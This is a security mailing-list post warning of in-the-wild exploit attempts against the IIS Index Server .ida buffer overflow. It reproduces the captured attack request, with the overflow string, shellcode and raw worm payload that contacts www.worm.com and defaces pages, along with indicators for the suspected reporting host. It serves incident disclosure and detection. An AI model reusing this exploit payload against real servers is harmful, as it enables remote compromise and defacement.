IIS .ida exploit involving worm.com / 181.com / 216.99.52.100

[Richard Bejtlich <richard () taosecurity com>]

Friends in the security world,

I have recently observed multiple exploit attempts related to the 
"Microsoft Index Server and Indexing Service ISAPI Extension Buffer 
Overflow Vulnerability" described here:

http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D2880

It looks like successful execution of an exploit in the wild may result 
in the compromised machine making a connection to www.worm.com to report 
its status (216.99.52.100, also aliased as 181.com and chinga.com; note 
chinga.com also has an address of 209.81.7.23).  Below is the signature 
of the exploit.  I edited sections marked XXcensoredXX to preserve my 
privacy:

GET 
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
 HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
 Accept: */*
Content-length: 3569

USVWp
hdGd=o
`hXw
pXXXxu
XX3f=MZXQ<X3fPEyXB<XTxXTTHXLL:KERN3LxEL32 X4TXB 
LHHHLLTH;HLX<GetPLX|rocAHHXTH$3f
LTQLLLLLLLXTH
LLXp
Gdpu8LLLhhu!hP;CKCK4*hQ4Rp;CKCKLhhhthhShhMlLhE[SScxMQPPu&jLPhQUBPl;CKCKPd}\PPPifPtEPH,RjLPQjj;CKCK;CKCKLLLLtghm;CKCKL4LLHhPPPh9PsP:LMTHuPLAHRjh@P;CKCKLLLL0}VL;u>L`hQ%;CKCKLLRHPh@Q;CKCKjhjjjhhcP;CKCK00tth;CKCK8R;CKCK>LLLLG:8P;CKCK>LLLL|th;CKCKjd;CKCKjjj;CKCKxf|f~P[j|QxR;CKCKLLLL}7h;CKCKjjQxR;CKCKh;CKCKDPPPiYPitPti3SkttPPtPut
tjd;CKCKjjj;CKCKxf|f~Ptj|RxP;CKCKjjhQxR;CKCKLEHhdddLLdtjLPMQhRxP;CKCKjjhQxR;CKCKLEHddddLLdtjLPMQdRxP;CKCKLhdddLLdtjLPhQxR;CKCKEHpLjLREHxQxR;CKCKjhPxQ;CKCKLxR;CKCK0XUWSVPj<Vhpt$(XPt$PX^[_] 
{xV4xV4xV4xV4xV4XPhGD$BE3LoadLibraryAGetSystemTimeCreateThreadCreateFileASleepGetSystemDefaultLangIDVirtualProtectinfocomm.dllTcpSockSendWS2_32.dllsocketconnectsendrecvclosesocketw3svc.dllGET 
?  HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
 Accept: */*
Content-length: 3569

c:\notwormLMTH
<html><head><meta http-equiv="Content-Type" content="text/html; 
charset=english"><title>HELLO!</title></head><bady><hr size=5><font 
color="red"><p align="center">Welcome to http://www.worm.com 
!<br><br>Hacked By Chinese!</font></hr></bady></html> HTTP/1.0 200
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 90

<TITLE>Error</TITLE>
<BODY>
<H1>Error</H1>
XXcensoredXX: Unknown WWW server.</BODY>

-----

Curious about www.worm.com, I connected to port 80 on the box and found 
this:

telnet www.worm.com 80
Trying 216.99.52.100...
Connected to chinga.com (216.99.52.100).
Escape character is '^]'.


<HTML>
<HEAD>
<META HTTP-EQUIV="REFRESH" CONTENT="0.01; 
URL=http://www.goto.com/d/home/p/nettcorp/lander/srchindex.jhtml";>
<TITLE> Nett Corp </TITLE>
</HEAD>
<blockquote><!-- dlogphp activated, unique hit site is 181.com.  IP is 
XXcensored, but it was my IP addressXX.  Broswer is -->
</blockquote>
</BODY>
</HTML>
Connection closed by foreign host.

-----

You can see in the 'dlogphp activated' section that my IP address 
appears to have been logged.  (I removed the actual IP address.)

I suggest that readers check their logs for connections to 216.99.52.100 
(www.worm.com), as outbound connections MAY indicate a compromised host. 
 I am not a Windows expert and cannot validate the exploit as recorded 
in my logs, but I believe you may find this warning useful.

Sincerely,

Richard Bejtlich
http://bejtlich.net





----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com